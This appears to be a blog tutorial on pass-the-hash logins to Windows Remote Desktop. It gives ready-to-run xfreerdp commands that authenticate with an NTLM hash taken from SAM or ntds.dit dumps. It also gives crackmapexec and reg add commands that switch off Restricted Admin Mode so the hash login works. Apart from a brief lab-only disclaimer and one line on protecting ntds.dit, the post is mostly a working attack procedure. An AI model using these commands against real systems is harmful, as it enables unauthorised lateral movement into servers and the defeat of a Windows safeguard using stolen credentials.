RDP : Pass-the-Hash Login (no Password)

If you have completed a password "audit" which is a non-technical term of saying you have "cracked passwords" and you get left with hashes that has been obtained from the SAM dump or Active Directory ntds.dit dump.

Note : This is why protecting the ntds.dit from these types of attacks is very important without the hashes you cannot use xfreerdp to connect to servers with the hash and not the password

Note : This is for educational and learning purposes, this should be done in a "lab" for your own knowledge and development.

Then you may find a example where you cannot "crack" the password to get the ASCII clear text password, so for examples like that when people have been "security vigilant" what you can do is pass-the-hash (or PtH)

Classic Remote Desktop

If you are wanting to get "Remote Desktop" access with the hash then the RDP client as shown below will not work, this requires the username and the password:


xfreerdp : PtH Supported

However you can use xfreerdp which is part of Kali and that will give you a RDP desktop without using the password, it using another distro install xfreerdp with this:

apt-get update
apt-get install freerdp-x11

Then we need this command (which will connect to computer called hack.me with the user "pth.user" on the domain "bear.local" with the hash as "pth"):

xfreerdp /u:pth.user /d:bear.local /pth:8846a85c584453c337827 /v:hack.me

Restricted Admin Mode : Danger there is dragons

However one major drawback of this is a security feature called "Restricted Admin Mode" which when you use PtH you will get an error like this:


Not to mention an entry in the event log like this, which clearly flags "restricted admin mode" as been flagged:


Excellent, Windows is protecting me against PtH attacks that good isn't it?

Bypass "Restricted Admin Mode" and putting the dragon back to sleep

Scenario 1 : You have no admin access and need to use the hash to get access

Yes, this is Windows so there is a bypass for this to get round this admin mode if you wish to do this remotely as you know the account has admin access to the server you need to use a utility called "crackmapexec" more on that here once installed on Kali that would then look like this:

Note : You need a utility that can supportes PtH as you do not know the password in this case and you know this servers access does have admin access.

crackmapexec smb hack.me -u "pth.user" -H "8846a85c584453c337827" -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'

Once this command has been issued you can then connect with xfreerdp to the target server with no restrictions and limitations using PtH and NOT the password.

Scenario 2 : You already have access to the device and can add registry keys 

That makes it easier you can locally or remotely add this registry key using the "reg add" command:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Registry Key Added, xfreerdp away

When this key is added you should then be able to remotely connect from Kali to the target machine using only the hash without the password:

xfreerdp /u:pth.user /d:bear.local /pth:8846a85c584453c337827 /v:hack.me

Previous Post Next Post

نموذج الاتصال